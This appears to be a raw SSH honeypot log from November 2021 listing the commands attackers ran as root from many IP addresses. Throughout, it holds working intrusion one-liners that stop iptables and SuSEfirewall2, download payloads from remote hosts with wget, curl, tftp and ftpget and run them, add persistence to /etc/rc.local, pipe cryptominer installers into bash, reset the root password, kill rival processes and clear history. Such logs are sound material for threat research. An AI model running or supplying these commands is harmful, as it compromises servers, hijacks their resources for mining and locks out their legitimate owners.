Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 43.129.29.174 19-Nov-2021 15:23:04 ssh2 root
Exec echo -n rz36s859|md5sum;uname -a
echo -n rz36s859|md5sum
uname -a

From 49.235.77.153 20-Nov-2021 07:05:42 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 142.93.214.155 20-Nov-2021 19:18:56 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.105.119.145/skidnet.sh; chmod 777 *; sh skidnet.sh; tftp -g 172.105.119.145 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.105.119.145/skidnet.sh
chmod 777 *
sh skidnet.sh
tftp -g 172.105.119.145 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 199.19.224.231 21-Nov-2021 00:39:44 ssh2 root
Exec cat /etc/issue; wget http://185.224.129.251/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Niki 6to quitna moito mom4e
cat /etc/issue
wget http://185.224.129.251/x86_64
chmod 777 *
./x86_64 x86xhed
echo Niki 6to quitna moito mom4e

From 194.85.248.46 21-Nov-2021 15:19:30 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s;wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s
wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s

From 209.141.47.245 21-Nov-2021 18:39:54 ssh2 root
Exec cat /etc/issue; wget http://185.224.129.251/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Niki 6to quitna moito mom4e
cat /etc/issue
wget http://185.224.129.251/x86_64
chmod 777 *
./x86_64 x86xhed
echo Niki 6to quitna moito mom4e

From 101.34.66.244 21-Nov-2021 21:47:20 ssh2 root
Exec curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 61.216.129.217 21-Nov-2021 23:21:50 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 45.64.134.113 21-Nov-2021 23:27:21 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 101.34.66.244 21-Nov-2021 23:27:48 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:31:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 193.8.4.40 21-Nov-2021 23:31:43 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 101.34.66.244 21-Nov-2021 23:33:07 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.44 21-Nov-2021 23:36:10 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 76.125.91.27 21-Nov-2021 23:36:20 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:37:09 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 185.212.129.247 21-Nov-2021 23:37:16 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 193.8.4.40 21-Nov-2021 23:37:31 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 193.8.4.40 21-Nov-2021 23:37:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 101.34.66.244 21-Nov-2021 23:37:52 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 201.184.37.15 21-Nov-2021 23:38:06 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 114.64.231.213 21-Nov-2021 23:38:54 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 101.34.66.244 21-Nov-2021 23:39:39 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 114.64.231.213 21-Nov-2021 23:39:42 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 114.64.231.213 21-Nov-2021 23:40:28 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.66.244 21-Nov-2021 23:40:31 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:40:51 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 194.67.78.218 21-Nov-2021 23:48:01 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 83.56.9.96 22-Nov-2021 00:26:36 ssh2 root
ps faux

From 83.56.9.96 22-Nov-2021 00:26:45 ssh2 root
uname -a
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 159.75.242.214 22-Nov-2021 00:26:47 ssh2 root
ls -lha

From 193.198.163.108 22-Nov-2021 00:27:06 ssh2 root
catoc/cpuinfo
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 119.29.141.189 22-Nov-2021 00:27:11 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
cat /proc/cpuinfo

From 110.42.198.251 22-Nov-2021 00:27:23 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
free -h

From 2.197.115.147 22-Nov-2021 00:27:39 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 157.245.107.84 22-Nov-2021 00:27:40 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 94.250.255.85 22-Nov-2021 00:31:51 ssh2 root
logout
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 83.56.9.96 22-Nov-2021 00:33:55 ssh2 root
htop

From 110.42.198.251 22-Nov-2021 00:34:06 ssh2 root
uptime

From 83.56.9.96 22-Nov-2021 00:34:11 ssh2 root
uptime
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 2.197.115.147 22-Nov-2021 00:34:16 ssh2 root
whoami

From 110.42.198.251 22-Nov-2021 00:34:24 ssh2 root
cat .bashrc

From 159.75.242.214 22-Nov-2021 00:34:25 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
ls -lh

From 146.56.222.230 22-Nov-2021 00:34:31 ssh2 root
cat /etc/issue

From 110.42.198.251 22-Nov-2021 00:34:37 ssh2 root
touch asdfasdfasdfasdfasdf
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 110.42.198.251 22-Nov-2021 00:34:42 ssh2 root
echo fffff
echo $??

From 157.245.107.84 22-Nov-2021 00:34:46 ssh2 root
echo $?

From 110.42.198.251 22-Nov-2021 00:34:47 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig


From 110.42.198.251 22-Nov-2021 00:34:51 ssh2 root
exit

From 34.136.179.229 22-Nov-2021 00:43:10 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
exit

From 110.42.198.251 22-Nov-2021 00:44:29 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 178.138.96.160 22-Nov-2021 00:53:58 ssh2 root
fuck you
exit

From 152.136.149.104 22-Nov-2021 01:16:35 ssh2 root
Exec curl -s -L http://152.136.149.104:280/xmr.sh | bash -s
curl -s -L http://152.136.149.104:280/xmr.sh | bash -s

From 222.186.133.167 22-Nov-2021 02:07:20 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 22-Nov-2021 02:37:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 167.71.12.34 22-Nov-2021 22:32:33 ssh2 root
Exec echo root:tsturi123|chpasswd|bash; pkill java; pkill ntpd; pkill screen; pkill Xorg; pkill koel; pkill x86; pkill cnrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:tsturi123|chpasswd|bash
pkill java
pkill ntpd
pkill screen
pkill Xorg
pkill koel
pkill x86
pkill cnrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 20.195.196.210 23-Nov-2021 04:03:25 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 194.163.165.136 23-Nov-2021 05:02:28 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 141.98.10.179 23-Nov-2021 14:38:47 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 141.98.10.246 24-Nov-2021 03:40:07 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 141.98.10.246 24-Nov-2021 04:42:44 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 178.62.85.214 24-Nov-2021 04:48:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.101.56.195/76d32be0.sh; curl -O http://46.101.56.195/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 46.101.56.195 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 46.101.56.195; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 46.101.56.195 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf * 
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.101.56.195/76d32be0.sh
curl -O http://46.101.56.195/76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp 46.101.56.195 -c get 76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp -r 76d32be02.sh -g 46.101.56.195
chmod 777 76d32be02.sh
sh 76d32be02.sh
ftpget -v -u anonymous -p anonymous -P 21 46.101.56.195 76d32be01.sh 76d32be01.sh
sh 76d32be01.sh
rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh
rm -rf *

From 209.141.32.141 24-Nov-2021 21:33:35 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
sudo hive-passwd cummingonthecumrightinfrontofthecumwhichiscummingonthecummyfloor
sudo pkill Xorg
sudo pkill x11vnc
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.32.141 25-Nov-2021 10:24:49 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
sudo hive-passwd cummingonthecumrightinfrontofthecumwhichiscummingonthecummyfloor
sudo pkill Xorg
sudo pkill x11vnc
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 167.71.12.34 25-Nov-2021 11:16:53 ssh2 root
Exec echo root:tstur2i123|chpasswd|bash; pkill java; pkill ntpd; pkill screen; pkill Xorg; pkill koel; pkill x86; pkill cnrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:tstur2i123|chpasswd|bash
pkill java
pkill ntpd
pkill screen
pkill Xorg
pkill koel
pkill x86
pkill cnrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 42.193.169.139 25-Nov-2021 15:02:37 ssh2 root
Exec curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
curl -s -L http://42.193.169.139:280/xmr.sh | bash -s

From 188.166.19.170 26-Nov-2021 02:02:36 ssh2 root
Exec sudo hive-passwd presidenthiveassos123; sudo pkill Xorg
sudo hive-passwd presidenthiveassos123
sudo pkill Xorg

From 20.206.109.196 26-Nov-2021 08:32:38 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 38.91.102.73 26-Nov-2021 20:25:09 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 107.189.10.234 28-Nov-2021 05:08:48 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.12.187/bins/sevensu.sh;chmod 777 sevensu.sh;./sevensu.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.12.187/bins/sevensu.sh
chmod 777 sevensu.sh
./sevensu.sh

From 137.220.194.92 28-Nov-2021 12:25:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 20.206.86.43 28-Nov-2021 14:23:05 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';nproc;curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
nproc
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 137.220.194.92 28-Nov-2021 16:30:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/xx;chmod 777 xx;./xx;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/xx
chmod 777 xx
./xx

From 137.220.194.92 28-Nov-2021 16:31:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/xxarm;chmod 777 xxarm;./xxarm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/xxarm
chmod 777 xxarm
./xxarm

From 222.186.133.160 28-Nov-2021 20:00:48 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/fff;chmod 777 fff;./fff;echo "cd /tmp/">>/etc/rc.local;echo "./fff&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/fff
chmod 777 fff
./fff
echo "cd /tmp/">>/etc/rc.local
echo "./fff
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 29-Nov-2021 07:19:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/cvv;chmod 777 cvv;./cvv;echo "cd /tmp/">>/etc/rc.local;echo "./cvv&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
